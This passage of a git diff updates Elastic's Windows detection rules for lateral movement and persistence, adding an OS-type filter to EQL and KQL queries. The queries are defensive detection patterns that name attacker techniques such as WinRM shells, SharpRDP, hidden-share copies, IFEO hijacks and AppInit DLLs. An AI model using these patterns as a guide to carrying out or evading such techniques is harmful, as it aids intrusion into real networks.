b/rules/windows/lateral_movement_execution_from_tsclient_mup.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and process.executable : "\\Device\\Mup\\tsclient\\*.exe" +process where host.os.type == "windows" and event.type == "start" and process.executable : "\\Device\\Mup\\tsclient\\*.exe" ''' diff --git a/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml b/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml index 94186d510..55a03fffa 100644 --- a/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml +++ b/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -74,8 +74,8 @@ type = "eql" query = ''' sequence with maxspan=1m - [file where event.type in ("creation", "change") and process.pid == 4 and file.extension : "exe"] by host.id, file.path - [process where event.type == "start"] by host.id, process.executable + [file where host.os.type == "windows" and event.type in ("creation", "change") and process.pid == 4 and file.extension : "exe"] by host.id, file.path + [process where host.os.type == "windows" and event.type == "start"] by host.id, process.executable ''' diff --git a/rules/windows/lateral_movement_incoming_winrm_shell_execution.toml b/rules/windows/lateral_movement_incoming_winrm_shell_execution.toml index 3d5202447..d849b93f0 100644 --- a/rules/windows/lateral_movement_incoming_winrm_shell_execution.toml +++ b/rules/windows/lateral_movement_incoming_winrm_shell_execution.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/27" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,10 +31,10 @@ type = "eql" query = ''' sequence by host.id with maxspan=30s - [network where process.pid == 4 and network.direction : ("incoming", "ingress") and + [network where host.os.type == "windows" and process.pid == 4 and network.direction : ("incoming", "ingress") and destination.port in (5985, 5986) and network.protocol == "http" and source.ip != "127.0.0.1" and source.ip != "::1" ] - [process where event.type == "start" and process.parent.name : "winrshost.exe" and not process.name : "conhost.exe"] + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "winrshost.exe" and not process.name : "conhost.exe"] ''' diff --git a/rules/windows/lateral_movement_incoming_wmi.toml b/rules/windows/lateral_movement_incoming_wmi.toml index dc04b0010..32399f80c 100644 --- a/rules/windows/lateral_movement_incoming_wmi.toml +++ b/rules/windows/lateral_movement_incoming_wmi.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -28,13 +28,13 @@ sequence by host.id with maxspan = 2s /* Accepted Incoming RPC connection by Winmgmt service */ - [network where process.name : "svchost.exe" and network.direction : ("incoming", "ingress") and + [network where host.os.type == "windows" and process.name : "svchost.exe" and network.direction : ("incoming", "ingress") and source.ip != "127.0.0.1" and source.ip != "::1" and source.port >= 49152 and destination.port >= 49152 ] /* Excluding Common FPs Nessus and SCCM */ - [process where event.type == "start" and process.parent.name : "WmiPrvSE.exe" and + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "WmiPrvSE.exe" and not process.args : ("C:\\windows\\temp\\nessus_*.txt", "C:\\windows\\TEMP\\nessus_*.TMP", "C:\\Windows\\CCM\\SystemTemp\\*", diff --git a/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml b/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml index 77dad2ab6..56fbd7dfa 100644 --- a/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml +++ b/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/18" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and ((process.name : "net.exe" or process.pe.original_file_name == "net.exe") or ((process.name : "net1.exe" or process.pe.original_file_name == "net1.exe") and not process.parent.name : "net.exe")) and process.args : "use" and diff --git a/rules/windows/lateral_movement_powershell_remoting_target.toml b/rules/windows/lateral_movement_powershell_remoting_target.toml index 802cf3bbf..ee1e5710e 100644 --- a/rules/windows/lateral_movement_powershell_remoting_target.toml +++ b/rules/windows/lateral_movement_powershell_remoting_target.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -34,9 +34,9 @@ type = "eql" query = ''' sequence by host.id with maxspan = 30s - [network where network.direction : ("incoming", "ingress") and destination.port in (5985, 5986) and + [network where host.os.type == "windows" and network.direction : ("incoming", "ingress") and destination.port in (5985, 5986) and network.protocol == "http" and source.ip != "127.0.0.1" and source.ip != "::1"] - [process where event.type == "start" and process.parent.name : "wsmprovhost.exe" and not process.name : "conhost.exe"] + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "wsmprovhost.exe" and not process.name : "conhost.exe"] ''' diff --git a/rules/windows/lateral_movement_rdp_enabled_registry.toml b/rules/windows/lateral_movement_rdp_enabled_registry.toml index 8eb554660..b380b0b42 100644 --- a/rules/windows/lateral_movement_rdp_enabled_registry.toml +++ b/rules/windows/lateral_movement_rdp_enabled_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -65,7 +65,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where event.type in ("creation", "change") and +registry where host.os.type == "windows" and event.type in ("creation", "change") and registry.path : "HKLM\\SYSTEM\\*ControlSet*\\Control\\Terminal Server\\fDenyTSConnections" and registry.data.strings : ("0", "0x00000000") and not (process.name : "svchost.exe" and user.domain == "NT AUTHORITY") and not process.executable : "C:\\Windows\\System32\\SystemPropertiesRemote.exe" diff --git a/rules/windows/lateral_movement_rdp_sharprdp_target.toml b/rules/windows/lateral_movement_rdp_sharprdp_target.toml index 2a22f2746..1829f7ab6 100644 --- a/rules/windows/lateral_movement_rdp_sharprdp_target.toml +++ b/rules/windows/lateral_movement_rdp_sharprdp_target.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,17 +31,17 @@ query = ''' /* Incoming RDP followed by a new RunMRU string value set to cmd, powershell, taskmgr or tsclient, followed by process execution within 1m */ sequence by host.id with maxspan=1m - [network where event.type == "start" and process.name : "svchost.exe" and destination.port == 3389 and + [network where host.os.type == "windows" and event.type == "start" and process.name : "svchost.exe" and destination.port == 3389 and network.direction : ("incoming", "ingress") and network.transport == "tcp" and source.ip != "127.0.0.1" and source.ip != "::1" ] - [registry where process.name : "explorer.exe" and + [registry where host.os.type == "windows" and process.name : "explorer.exe" and registry.path : ("HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\*") and registry.data.strings : ("cmd.exe*", "powershell.exe*", "taskmgr*", "\\\\tsclient\\*.exe\\*") ] - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and (process.parent.name : ("cmd.exe", "powershell.exe", "taskmgr.exe") or process.args : ("\\\\tsclient\\*.exe")) and not process.name : "conhost.exe" ] diff --git a/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml b/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml index fec006f09..19d0fbce3 100644 --- a/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml +++ b/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : ("cmd.exe", "powershell.exe", "robocopy.exe", "xcopy.exe") and process.args : ("copy*", "move*", "cp", "mv") and process.args : "*$*" ''' diff --git a/rules/windows/lateral_movement_remote_service_installed_winlog.toml b/rules/windows/lateral_movement_remote_service_installed_winlog.toml index b7138c580..526b7c577 100644 --- a/rules/windows/lateral_movement_remote_service_installed_winlog.toml +++ b/rules/windows/lateral_movement_remote_service_installed_winlog.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,9 +25,9 @@ type = "eql" query = ''' sequence by winlog.logon.id, winlog.computer_name with maxspan=1m -[authentication where event.action == "logged-in" and winlog.logon.type : "Network" and +[authentication where host.os.type == "windows" and event.action == "logged-in" and winlog.logon.type : "Network" and event.outcome=="success" and source.ip != null and source.ip != "127.0.0.1" and source.ip != "::1"] -[iam where event.action == "service-installed" and +[iam where host.os.type == "windows" and event.action == "service-installed" and not winlog.event_data.SubjectLogonId : "0x3e7" and not winlog.event_data.ServiceFileName : ("?:\\Windows\\ADCR_Agent\\adcrsvc.exe", diff --git a/rules/windows/lateral_movement_remote_services.toml b/rules/windows/lateral_movement_remote_services.toml index 29b171be0..9558e5f1d 100644 --- a/rules/windows/lateral_movement_remote_services.toml +++ b/rules/windows/lateral_movement_remote_services.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/16" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -82,12 +82,12 @@ type = "eql" query = ''' sequence with maxspan=1s - [network where process.name : "services.exe" and + [network where host.os.type == "windows" and process.name : "services.exe" and network.direction : ("incoming", "ingress") and network.transport == "tcp" and source.port >= 49152 and destination.port >= 49152 and source.ip != "127.0.0.1" and source.ip != "::1" ] by host.id, process.entity_id - [process where event.type == "start" and process.parent.name : "services.exe" and + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "services.exe" and not (process.name : "svchost.exe" and process.args : "tiledatamodelsvc") and not (process.name : "msiexec.exe" and process.args : "/V") and not process.executable : diff --git a/rules/windows/lateral_movement_remote_task_creation_winlog.toml b/rules/windows/lateral_movement_remote_task_creation_winlog.toml index c9f6ce710..e1071952d 100644 --- a/rules/windows/lateral_movement_remote_task_creation_winlog.toml +++ b/rules/windows/lateral_movement_remote_task_creation_winlog.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -56,12 +56,12 @@ query = ''' /* Network Logon followed by Scheduled Task creation */ sequence by winlog.computer_name with maxspan=1m - [authentication where event.action == "logged-in" and + [authentication where host.os.type == "windows" and event.action == "logged-in" and winlog.logon.type == "Network" and event.outcome == "success" and not user.name == "ANONYMOUS LOGON" and not winlog.event_data.SubjectUserName : "*$" and not user.domain == "NT AUTHORITY" and source.ip != "127.0.0.1" and source.ip !="::1"] by winlog.event_data.TargetLogonId - [iam where event.action == "scheduled-task-created"] by winlog.event_data.SubjectLogonId + [iam where host.os.type == "windows" and event.action == "scheduled-task-created"] by winlog.event_data.SubjectLogonId ''' diff --git a/rules/windows/lateral_movement_scheduled_task_target.toml b/rules/windows/lateral_movement_scheduled_task_target.toml index e477f9dca..b9d993e3f 100644 --- a/rules/windows/lateral_movement_scheduled_task_target.toml +++ b/rules/windows/lateral_movement_scheduled_task_target.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -52,11 +52,11 @@ query = ''' /* Task Scheduler service incoming connection followed by TaskCache registry modification */ sequence by host.id, process.entity_id with maxspan = 1m - [network where process.name : "svchost.exe" and + [network where host.os.type == "windows" and process.name : "svchost.exe" and network.direction : ("incoming", "ingress") and source.port >= 49152 and destination.port >= 49152 and source.ip != "127.0.0.1" and source.ip != "::1" ] - [registry where registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\\Actions"] + [registry where host.os.type == "windows" and registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\\Actions"] ''' diff --git a/rules/windows/lateral_movement_service_control_spawned_script_int.toml b/rules/windows/lateral_movement_service_control_spawned_script_int.toml index b8f0b59ea..ea3029710 100644 --- a/rules/windows/lateral_movement_service_control_spawned_script_int.toml +++ b/rules/windows/lateral_movement_service_control_spawned_script_int.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -31,7 +31,7 @@ type = "eql" query = ''' /* This rule is not compatible with Sysmon due to user.id issues */ -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and (process.name : "sc.exe" or process.pe.original_file_name == "sc.exe") and process.parent.name : ("cmd.exe", "wscript.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe", "mshta.exe","powershell.exe", "pwsh.exe") and diff --git a/rules/windows/lateral_movement_suspicious_rdp_client_imageload.toml b/rules/windows/lateral_movement_suspicious_rdp_client_imageload.toml index 19a754c80..a9115c276 100644 --- a/rules/windows/lateral_movement_suspicious_rdp_client_imageload.toml +++ b/rules/windows/lateral_movement_suspicious_rdp_client_imageload.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -any where (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and +any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and (dll.name : "mstscax.dll" or file.name : "mstscax.dll") and /* depending on noise in your env add here extra paths */ process.executable : diff --git a/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml b/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml index e30918875..a8f3bcb60 100644 --- a/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml +++ b/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type in ("creation", "change") and +file where host.os.type == "windows" and event.type in ("creation", "change") and /* via RDP TSClient mounted share or SMB */ (process.name : "mstsc.exe" or process.pid == 4) and diff --git a/rules/windows/persistence_ad_adminsdholder.toml b/rules/windows/persistence_ad_adminsdholder.toml index b980b44ba..24738e44f 100644 --- a/rules/windows/persistence_ad_adminsdholder.toml +++ b/rules/windows/persistence_ad_adminsdholder.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,8 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.action:"Directory Service Changes" and event.code:5136 and winlog.event_data.ObjectDN:CN=AdminSDHolder,CN=System* +event.action:"Directory Service Changes" and host.os.type:windows and event.code:5136 and + winlog.event_data.ObjectDN:CN=AdminSDHolder,CN=System* ''' diff --git a/rules/windows/persistence_adobe_hijack_persistence.toml b/rules/windows/persistence_adobe_hijack_persistence.toml index 1de3f1eea..6aa5bc627 100644 --- a/rules/windows/persistence_adobe_hijack_persistence.toml +++ b/rules/windows/persistence_adobe_hijack_persistence.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -77,7 +77,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type == "creation" and +file where host.os.type == "windows" and event.type == "creation" and file.path : ("?:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF\\RdrCEF.exe", "?:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF\\RdrCEF.exe") and not process.name : "msiexec.exe" diff --git a/rules/windows/persistence_app_compat_shim.toml b/rules/windows/persistence_app_compat_shim.toml index 8facccf5e..c6ca44c22 100644 --- a/rules/windows/persistence_app_compat_shim.toml +++ b/rules/windows/persistence_app_compat_shim.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,9 +25,9 @@ type = "eql" query = ''' sequence by process.entity_id with maxspan = 5m - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and not (process.name : "sdbinst.exe" and process.parent.name : "msiexec.exe")] - [registry where event.type in ("creation", "change") and + [registry where host.os.type == "windows" and event.type in ("creation", "change") and registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\\*.sdb"] ''' diff --git a/rules/windows/persistence_appcertdlls_registry.toml b/rules/windows/persistence_appcertdlls_registry.toml index 0940313e3..836e354f8 100644 --- a/rules/windows/persistence_appcertdlls_registry.toml +++ b/rules/windows/persistence_appcertdlls_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where +registry where host.os.type == "windows" and /* uncomment once stable length(bytes_written_string) > 0 and */ registry.path : "HKLM\\SYSTEM\\*ControlSet*\\Control\\Session Manager\\AppCertDLLs\\*" ''' diff --git a/rules/windows/persistence_appinitdlls_registry.toml b/rules/windows/persistence_appinitdlls_registry.toml index 735550248..5fd69e4ea 100644 --- a/rules/windows/persistence_appinitdlls_registry.toml +++ b/rules/windows/persistence_appinitdlls_registry.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/09" +updated_date = "2023/03/02" [rule] author = ["Elastic"] @@ -81,7 +81,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where +registry where host.os.type == "windows" and registry.path : ("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls", "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_Dlls") and not process.executable : ("C:\\Windows\\System32\\msiexec.exe", diff --git a/rules/windows/persistence_dontexpirepasswd_account.toml b/rules/windows/persistence_dontexpirepasswd_account.toml index e5600b10f..923487c9e 100644 --- a/rules/windows/persistence_dontexpirepasswd_account.toml +++ b/rules/windows/persistence_dontexpirepasswd_account.toml @@ -4,7 +4,7 @@ integration = ["system", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/02/01" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -77,7 +77,8 @@ timestamp_override = "event.ingested" type = "query" query = ''' -event.action:"modified-user-account" and event.code:"4738" and message:"'Don't Expire Password' - Enabled" and not user.id:"S-1-5-18" +event.action:"modified-user-account" and host.os.type:windows and event.code:"4738" and + message:"'Don't Expire Password' - Enabled" and not user.id:"S-1-5-18" ''' diff --git a/rules/windows/persistence_driver_newterm_imphash.toml b/rules/windows/persistence_driver_newterm_imphash.toml index 320b65e65..255a90647 100644 --- a/rules/windows/persistence_driver_newterm_imphash.toml +++ b/rules/windows/persistence_driver_newterm_imphash.toml @@ -4,7 +4,7 @@ maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup, New Term" min_stack_version = "8.6.0" integration = ["endpoint"] -updated_date = "2023/01/23" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "new_terms" query = ''' -event.category : "driver" and event.action : "load" +event.category:"driver" and host.os.type:windows and event.action:"load" ''' diff --git a/rules/windows/persistence_evasion_hidden_local_account_creation.toml b/rules/windows/persistence_evasion_hidden_local_account_creation.toml index b3bd725ce..124127312 100644 --- a/rules/windows/persistence_evasion_hidden_local_account_creation.toml +++ b/rules/windows/persistence_evasion_hidden_local_account_creation.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -61,7 +61,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where registry.path : "HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\*$\\" +registry where host.os.type == "windows" and registry.path : "HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\*$\\" ''' diff --git a/rules/windows/persistence_evasion_registry_ifeo_injection.toml b/rules/windows/persistence_evasion_registry_ifeo_injection.toml index a83eb10d1..90c498847 100644 --- a/rules/windows/persistence_evasion_registry_ifeo_injection.toml +++ b/rules/windows/persistence_evasion_registry_ifeo_injection.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where length(registry.data.strings) > 0 and +registry where host.os.type == "windows" and length(registry.data.strings) > 0 and registry.path : ("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\*.exe\\Debugger", "HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\*\\Debugger", "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\*\\MonitorProcess", diff --git a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml index 5dd7eb84b..4619537be 100644 --- a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml +++ b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/15" integration = ["endpoint"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -77,7 +77,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -registry where +registry where host.os.type == "windows" and registry.path : ( "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Common Startup", "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Common Startup", diff --git a/rules/windows/persistence_gpo_schtask_service_creation.toml b/rules/windows/persistence_gpo_schtask_service_creation.toml index 396a61657..e8d64f51d 100644 --- a/rules/windows/persistence_gpo_schtask_service_creation.toml +++ b/rules/windows/persistence_gpo_schtask_service_creation.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "windows" and event.type != "deletion" and file.path : ("?:\\Windows\\SYSVOL\\domain\\Policies\\*\\MACHINE\\Preferences\\ScheduledTasks\\ScheduledTasks.xml", "?:\\Windows\\SYSVOL\\domain\\Policies\\*\\MACHINE\\Preferences\\Services\\Services.xml") and not process.name : "dfsrs.exe" diff --git a/rules/windows/persistence_local_scheduled_job_creation.toml b/rules/windows/persistence_local_scheduled_job_creation.toml index 6f1b47e23..2e5cba9f7 100644 --- a/rules/windows/persistence_local_scheduled_job_creation.toml +++ b/rules/windows/persistence_local_scheduled_job_creation.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "windows" and event.type != "deletion" and file.path : "?:\\Windows\\Tasks\\*" and file.extension : "job" ''' diff --git a/rules/windows/persistence_local_scheduled_task_creation.toml b/rules/windows/persistence_local_scheduled_task_creation.toml index 62f235184..5480c2df6 100644 --- a/rules/windows/persistence_local_scheduled_task_creation.toml +++ b/rules/windows/persistence_local_scheduled_task_creation.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,14 +30,14 @@ type = "eql" query = ''' sequence with maxspan=1m - [process where event.type != "end" and + [process where host.os.type == "windows" and event.type != "end" and ((process.name : ("cmd.exe", "wscript.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe", "mshta.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe", "WmiPrvSe.exe", "wsmprovhost.exe", "winrshost.exe") or process.pe.original_file_name : ("cmd.exe", "wscript.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe", "mshta.exe", "powershell.exe", "pwsh.dll", "powershell_ise.exe", "WmiPrvSe.exe", "wsmprovhost.exe", "winrshost.exe")) or process.code_signature.trusted == false)] by process.entity_id - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and (process.name : "schtasks.exe" or process.pe.original_file_name == "schtasks.exe") and process.args : ("/create", "-create") and process.args : ("/RU", "/SC", "/TN", "/TR", "/F", "/XML") and /* exclude SYSTEM Integrity Level - look for task creations by non-SYSTEM user */ diff --git a/rules/windows/persistence_local_scheduled_task_scripting.toml b/rules/windows/persistence_local_scheduled_task_scripting.toml index 0b93ac78a..0fa769689 100644 --- a/rules/windows/persistence_local_scheduled_task_scripting.toml +++ b/rules/windows/persistence_local_scheduled_task_scripting.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,10 +29,10 @@ type = "eql" query = ''' sequence by host.id with maxspan = 30s - [any where (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and + [any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and (dll.name : "taskschd.dll" or file.name : "taskschd.dll") and process.name : ("cscript.exe", "wscript.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe")] - [registry where registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\\Actions"] + [registry where host.os.type == "windows" and registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\*\\Actions"] ''' diff --git a/rules/windows/persistence_ms_office_addins_file.toml b/rules/windows/persistence_ms_office_addins_file.toml index f83141be7..7525b5f11 100644 --- a/rules/windows/persistence_ms_office_addins_file.toml +++ b/rules/windows/persistence_ms_office_addins_file.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -27,7 +27,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "windows" and event.type != "deletion" and 